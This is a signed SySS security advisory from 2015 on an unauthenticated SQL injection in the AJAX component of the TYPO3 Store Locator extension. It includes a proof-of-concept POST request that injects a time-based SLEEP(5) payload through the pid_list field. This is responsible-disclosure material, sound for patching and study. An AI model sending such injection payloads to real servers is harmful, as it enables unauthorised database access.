-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Advisory ID: SYSS-2015-011 Product: TYPO3 Extension Store Locator (locator) Vendor: TYPO3 Association Affected Version(s): 3.3.0 and below Tested Version(s): 3.3.0 Vulnerability Type: SQL Injection (CWE-89) Risk Level: High Solution Status: Open Vendor Notification: 2015-02-27 Solution Date: 2015-04-27 Public Disclosure: 2015-06-22 CVE Reference: Not assigned Author of Advisory: Franz G. Jahn, SySS GmbH, https://www.syss.de/advisories/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Overview: An SQL Injection vulnerability could be identified in the TYPO3 extension Store Locator (locator) Store Locator (locator) is a TYPO3 extension which integrates GoogleMaps into TYPO3. The extension is described as follows (see [1]): "Manage store locations, search by distance and show Google maps and route maps, stores can be tt_address, fe users and tt_news records too. Traffic-, bicycling- and weather-layer enabled in api v3." ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Vulnerability Details: The SySS GmbH found an SQL injection vulnerability in the AJAX component of the TYPO3 extension locator. The attribute pid_list of the JSON encoded parameter data is not validated server-side and can be therefore be abused to inject arbitrary SQL statements. This SQL injection vulnerability can be exploited by an unauthenticated attacker by sending a specially crafted HTTP POST request (see PoC section). ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Proof of Concept (PoC): The following request can be used to delay the server response delay the server response by five secondy: POST /index.php?eID=tx_locator_eID HTTP/1.1 Host: User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.4.0 Accept: */* Content-Type: application/x-www-form-urlencoded; charset=UTF-8 ref=Tuebingen%3ADE%3A20%3A&data={"pid_list":"1+AND+SLEEP(5)","radiusPresets":"20","resultLimit":"300"}&tx_locator_pi1%5Baction%5D=getMarkers&tx_locator_pi1%5Bsearch%5D=Tuebingen%3ADE%3A23000%3A&tx_locator_pi1%5Bpw%5D=0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Solution: Update extension to the latest version. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclosure Timeline: 2015-02-23: Vulnerability discovered 2015-02-27: Vulnerability reported to vendor 2015-04-27: Vendor releases fix for the described security vulnerabilities 2015-06-15: Release of the TYPO3 Security Bulletin TYPO3-EXT-SA-2015-09 [2] 2015-06-22: Public release of security advisory ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ References: [1] TYPO3, Extension Store Locator (locator) http://typo3.org/extensions/repository/view/locator [2] TYPO3, TYPO3-EXT-SA-2015-09: SQL Injection vulnerability in extension Store Locator (locator) http://typo3.org/teams/security/security-bulletins/typo3-extensions/typo3-ext-sa-2015-014/ [3] SySS Security Advisory SYSS-2015-011 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2015-011.txt [4] SySS GmbH, SySS Responsible Disclosure Policy https://www.syss.de/en/news/responsible-disclosure-policy/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Credits: This Security vulnerability was found by Franz G. Jahn of the SySS GmbH. E-Mail: franz.jahn@syss.de Public Key: https://www.syss.de/fileadmin/dokumente/Materialien/PGPKeys/Franz_Jahn.asc Key ID: 0xD06A14DE Key Fingerprint: 2D26 E435 DF7F 572D A0C9 1DE8 D5A6 1496 D06A 14DE ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclaimer: The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on the SySS Web site. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Copyright: Creative Commons - Attribution (by) - Version 3.0 URL: http://creativecommons.org/licenses/by/3.0/deed.en -----BEGIN PGP SIGNATURE----- Version: GnuPG v1 iQIcBAEBCgAGBQJVh8MAAAoJENWmFJbQahTegEcQAJOfFD6t51KDCa4aNr8ruRbX Osdv3tstK+JP0fZE632lAvRbYhvaLh30tTMa5oR8A3PHLpVClGsXrtXjlPtn+yiu FO8dDLw5p+t4XisObfJ/xiLax4cZ/XXfOfJpNSFJgC7F4AmBQmW9n9CAgsJQelhv c5WB5FeSJh5cqw6QTwfpZb89/PX4LRGBTaILxVeWuzcWs9zH3zZWECYYMB9tAaaW xRUCwf3HBm/ATMR4zXb2EJng0O8rsXjFAHMqIg4tUWCdOvil2qVW9DEkV80LeogZ KXlOgtjaww9J6nIsOmB/hJbN5LLMqXFiqx2x74CQ45NSYu/k3RH3pqephzn0Dj6k +OO8iB3/Denxme6HsC9z3dQcWH0/HjwS6sxVIgJO+ZPLkzgQEOvEK3TjKuoAJHjn 97PjtAbVFbVf4zW80Hh07rHWyWLHVNquPjFKobRbNgw2B0sRTLfvlC064lrMqHIX /HmChfwccm6BZ/vqUWhZMx9OUUwRTrCLqmQ5NvSEqJ6CSt4d+DrT1RFmQ71zb31G XTAmq6OdZNNPRt0uTqa+4+HWvBWPvxqjZLNRk2/W3N9S5J2QeRkqJ5TiOKK7FLka MnAAfN9GSXr/QRbW3epan0BL8cgl3zgxCYX94T82ta+pZbeXjMN6SX/dQuKgV2E5 WxESkE7XOibUZjEuRnr/ =EIa7 -----END PGP SIGNATURE-----